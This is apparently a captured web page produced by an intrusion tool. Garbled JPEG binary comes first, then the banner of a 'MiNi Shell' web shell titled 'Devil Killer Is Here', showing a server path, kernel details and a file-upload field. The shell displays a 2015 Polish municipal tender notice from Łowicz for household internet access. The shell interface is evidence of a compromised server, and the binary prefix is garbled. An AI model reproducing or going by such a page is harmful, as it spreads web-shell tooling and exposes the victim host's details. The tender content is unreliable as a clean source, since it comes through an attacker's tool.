JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151008/266148-N-2015.html

<p class="kh_header"><b>Łowicz: Zapewnienie i utrzymanie stałego dostępu do Internetu w celu zapewnienia trwałości projektu numer: POIG.08.03.00-10-046/13 pn. Zapewnienie dostępu do Internetu osobom zagrożonym wykluczeniem cyfrowym z terenu miasta Łowicza</b><br>
<b>Numer ogłoszenia: 266148 - 2015; data zamieszczenia: 08.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Łowicza - Urząd Miejski w Łowiczu , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 46 8309151, faks 46 8309160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lowicz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zapewnienie i utrzymanie stałego dostępu do Internetu w celu zapewnienia trwałości projektu numer: POIG.08.03.00-10-046/13 pn. Zapewnienie dostępu do Internetu osobom zagrożonym wykluczeniem cyfrowym z terenu miasta Łowicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA
1) Przedmiotem zamówienia jest usługa określona w Wspólnym Słowniku Zamówień (CPV) kodem i nazwą: 72 40 00 00-4 Usługi internetowe i 72 31 80 00-7 Usługi przesyłu danych, polegająca na dostarczeniu sygnału internetowego, zapewnieniu i utrzymywaniu stałego dostępu do Internetu oraz wykonaniu odpowiednich prac instalacyjnych zapewniających dostęp do Internetu  dla wszystkich 88 gospodarstw domowych (Beneficjentów Końcowych Projektu), w celu zapewnienia trwałości projektu numer: POIG.08.03.00-10-046/13 pn. Zapewnienie dostępu do Internetu osobom zagrożonym wykluczeniem cyfrowym z terenu miasta Łowicza, zwanego dalej Projektem, realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka, 8. Oś priorytetowa, Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, Działanie 8.3 Przeciwdziałanie wykluczeniu cyfrowemu    - eInclusion, współfinansowanego                   ze środków Unii Europejskiej w ramach Europejskiego Funduszu Rozwoju Regionalnego i budżetu państwa na podstawie umowy o dofinansowanie                                nr POIG.08.03.00-10-046/13-00.
2)	Zakres rzeczowy przedmiotu zamówienia, o którym mowa w pkt 1, obejmuje realizację następujących zadań:
a)	Zadanie I - polegające na wykonaniu odpowiednich prac instalacyjnych 	zapewniających dostęp do Internetu  dla wszystkich 88 gospodarstw domowych 	(Beneficjentów Końcowych Projektu) w terminie do dnia 31.12.2015 r.                           	(prace instalacyjne będą świadczone etapowo - poszczególne etapy będą 	realizowane po przekazaniu stosownej informacji przez Zamawiającego 	zawierającej gotowość przyjęcia usługi, imiona, nazwiska i adresy Beneficjentów 	Końcowych Projektu do wykonania odpowiednich prac instalacyjnych 	zapewniających dostęp do Internetu, przy czym Zamawiający przewiduje                    	ww. prace instalacyjne w 2 etapach),
b)	Zadanie II - polegające na dostarczeniu sygnału internetowego, świadczeniu 	usługi zapewnienia i utrzymywania stałego dostępu do Internetu dla wszystkich  	88 gospodarstw domowych (Beneficjentów Końcowych Projektu)                                 	od uruchomienia dostawy sygnału internetowego, tj. od dnia 1.01.2016 r.                           	do dnia 31.12.2018 r. (zarówno wykonanie, jak również wykonywanie ww. usługi 	nastąpi w okresie od dnia 1.01.2016 r. do dnia 31.12.2018 r.).
3)	Szczegółowy opis przedmiotu zamówienia jest wyspecyfikowany w Załączniku                   Nr 1 do niniejszej Specyfikacji Istotnych Warunków Zamówienia.
4)	W celu potwierdzenia, że oferowane usługi, o których mowa w pkt 1-2 odpowiadają wymaganiom określonym przez Zamawiającego, o których mowa w Załączniku               Nr 1 do Specyfikacji Istotnych Warunków Zamówienia, wymaga się dostarczenia wraz ofertą dokumentów w postaci opisów oferowanych elementów złącza internetowego. 
5)	W celu udokumentowania wykonanej usługi, o której mowa w pkt 1 i 2 lit. a, Wykonawca do odbioru przedmiotu usługi zobowiązany jest do przedłożenia Zamawiającemu wykazu wykonanych odpowiednich prac instalacyjnych                             wraz z zainstalowanymi elementami złącza internetowego z wyszczególnieniem: nazw, nazw producenta, producenta, numerów seryjnych jeżeli dotyczą (występują), numerów IMEI jeżeli dotyczą (występują), wartości brutto, imion i nazwisk Beneficjentów Końcowych Projektu, adresów instalacji i terminów wykonania prac instalacyjnych.  
6)	W celu wykonania zleconej usługi polegającej na dostarczeniu sygnału internetowego, zapewnieniu i utrzymywaniu stałego dostępu do Internetu oraz wykonania odpowiednich prac instalacyjnych zapewniających dostęp do Internetu dla wszystkich 88 gospodarstw domowych (Beneficjentów Końcowych Projektu), w celu zapewnienia trwałości Projektu, o której mowa w pkt 1-5, Wykonawca zobowiązany jest do zawarcia w terminie wyznaczonym przez Zamawiającego odrębnej umowy regulującej zabezpieczenie przetwarzania danych osobowych na podstawie, której Zamawiający powierzy Wykonawcy przetwarzanie danych osobowych Beneficjentów Końcowych Projektu. 

	Uwagi do ust. 3 pkt 2 lit. a niniejszej Specyfikacji Istotnych Warunków Zamówienia:
1.	Wykonanie odpowiednich prac instalacyjnych zapewniających dostęp do Internetu 	nastąpi po dostawie sprzętu komputerowego (odrębne zamówienie publiczne                      	już wykonane). Podłączenie, konfiguracja i uruchomienie elementów zainstalowanego 	złącza internetowego w celu umożliwienia i uruchomienia odbioru sygnału 	internetowego leży po stronie Wykonawcy niniejszego przedmiotu zamówienia.
2.	Do dnia 31.12.2015 r. włącznie z tym dniem, usługa dostarczenia sygnału internetowego oraz usługa zapewnienia i utrzymania stałego dostępu do Internetu   dla wszystkich 88 gospodarstw domowych (Beneficjentów Końcowych Projektu)                  jest wykonywana przez aktualnego Wykonawcę zgodnie z zawartą umową w sprawie zamówienia publicznego (odrębne zamówienie publiczne w trakcie wykonywania).               W związku z powyższym wszystkie prace instalacyjne zapewniające dostęp                           do Internetu wykonane przez Wykonawcę niniejszego przedmiotu zamówienia (nowego Wykonawcę) muszą być realizowane w taki sposób, aby w żaden sposób nie wpłynęły                i nie wpływały na świadczoną obecnie do dnia 31.12.2015 r. (włącznie z tym dniem) usługę dostarczenia sygnału internetowego oraz usługę zapewnienia i utrzymania stałego dostępu do Internetu dla wszystkich gospodarstw domowych (Beneficjentów Końcowych Projektu). Przejście z jednego Wykonawcy (aktualnego) na drugiego Wykonawcę (nowego) w zakresie świadczonej usługi, o której mowa wyżej musi nastąpić płynnie, bez możliwości wystąpienia jakichkolwiek przerw w dostawie sygnału internetowego.
                           
	Uwaga do niniejszej Specyfikacji Istotnych Warunków Zamówienia:
	Wykonawca powinien dokładnie zapoznać się z niniejszą Specyfikacją Istotnych Warunków Zamówienia i złożyć ofertę zgodnie z jej wymaganiami.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.40.00.00-4, 72.31.80.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM
1)	Wadium należy wnieść przed upływem terminu składania ofert, o którym mowa           w ust. 11 pkt 1 lit. a niniejszej Specyfikacji Istotnych Warunków Zamówienia. 
2)	Za dzień wniesienia wadium w pieniądzu uważa się datę wpływu środków finansowych (wadium) na rachunek Zamawiającego, a nie datę obciążenia rachunku Wykonawcy (wpłaty).     
3)	Wadium w wysokości: 4 000,00 zł (słownie: cztery tysiące złotych 00/100) (zgodnie                 z art. 45 ust. 6 Ustawy) Wykonawca może wnieść w jednej lub kilku następujących formach:  
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275, z późn. zm.),
4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Urzędu Miejskiego w Łowiczu nr 04 2030 0045 1110 0000 0236 7900 Bank Gospodarki Żywnościowej S.A. Oddział w Łowiczu. 
5)	Oferta nie zabezpieczona wadium (w formie zgodnej z art. 45 ust. 6 Ustawy) zostanie odrzucona.
6)	W przypadku wniesienia wadium w postaci poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji  ubezpieczenio?wej lub poręczeniach udzielanych przez podmioty, o których mowa                 w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej 	Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275, z późn. zm.),   oryginał musi być złożony wraz z ofertą lub w oddzielnej kopercie zwrotu dołączonej do oferty i musi być wystawione na cały okres związania ofertą. W przypadku złożenia oryginału wadium w oddzielnej kopercie zwrotu dołączonej do oferty, wskazane jest dołączenie kopii ww. wadium poświadczonej za zgodność z oryginałem przez Wykonawcę (kopi każdej strony) do złożonej oferty. Do tak złożonego wadium wskazane jest dołączenie pisemnej informacji dotyczącej sposobu jego zwrotu.                     W przypadku braku powyższej informacji zwrot wadium w przypadkach określonych  w Ustawie nastąpi na adres Wykonawcy.      

Uwagi do ust. 8 pkt 4 niniejszej Specyfikacji Istotnych Warunków Zamówienia:  
1.	Niedopuszczalne jest wpłacanie wadium w kasie Urzędu Miejskiego w Łowiczu.
2.	Wskazane jest dołączenie dowodu wpłaty wadium do złożonej oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; w tym zakresie Zamawiający nie określa dodatkowych wymagań dla Wykonawcy. 
2) OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a) posiadania wiedzy i doświadczenia; w tym zakresie Zamawiający wymaga,                              aby Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonał  lub wykonuje minimum jedną usługę polegającą na zapewnieniu i utrzymaniu stałego dostępu do Internetu oraz wykonaniu odpowiednich prac instalacyjnych zapewniających dostęp do Internetu dla minimum 46 punktów odbiorczych.                        
2)	OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	dysponowania odpowiednim potencjałem technicznym; w tym zakresie Zamawiający nie określa dodatkowych wymagań dla Wykonawcy.
2)	OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	dysponowania osobami zdolnymi                  do wykonania zamówienia; w tym zakresie Zamawiający nie określa dodatkowych wymagań dla Wykonawcy.
2)	OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) WARUNKI UDZIAŁU W POSTĘPOWANIU
O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 	określone w art. 22 ust. 1 Ustawy, tj. warunki dotyczące: 
a)	sytuacji ekonomicznej i finansowej; w tym zakresie Zamawiający wymaga,                    aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości              nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100),                 przy czym ważność polisy, a w przypadku jej braku innego dokumentu ubezpieczenia, musi obejmować co najmniej dzień składania oferty; Wykonawca, który zostanie wybrany na Wykonawcę przedmiotu zamówienia zobowiązany jest do przedstawienia Zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego opłaconej polisy lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100). Obowiązek ten nie dotyczy Wykonawcy, którego polisa lub inny dokument ubezpieczenia złożony wraz z ofertą obejmuje okres objęty realizacją przedmiotu zamówienia. W przypadku przedstawienia przez Wykonawcę Zamawiającemu przed podpisaniem  umowy w sprawie zamówienia publicznego opłaconej polisy lub innego dokumentu potwierdzającego,                           że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości                  nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100)                           nie obejmującego całego okresu realizacji przedmiotu zamówienia, Wykonawca ten zobowiązany jest przedstawienia Zamawiającemu kolejnych opłaconych polis lub innych dokumentów potwierdzających, że Wykonawca jest ubezpieczony                          od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                   z przedmiotem zamówienia w wysokości nie mniejszej niż 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100) w okresie realizacji przedmiotu zamówienia.   
2)	OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU
a)	ocena ofert w zakresie spełniania warunków udziału w postępowaniu będzie oparta na ocenie spełniania przez nich wszystkich kryteriów określonych                       w niniejszej Specyfikacji Istotnych Warunków Zamówienia na zasadzie spełnia / nie spełnia, tzn. każdy z Wykonawców musi spełniać wszystkie enumeratywnie wymienione warunki pod rygorem odrzucenia oferty lub wykluczenia Wykonawcy,
b)	sposób przeprowadzenia postępowania o udzielenie zamówienia określa regulamin Komisji przetargowej powołanej do przygotowania i przeprowadzenia przedmiotowego postępowania,
c)	w przypadku złożenia przez Wykonawcę dokumentów zawierających dane finansowe wyrażone w walutach innych niż PLN, sprawdzenie spełnienia warunków nastąpi poprzez przeliczenie tej waluty na PLN według bieżącego kursu średniego walut obcych w złotych na podstawie tabeli kursów Narodowego Banku Polskiego z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

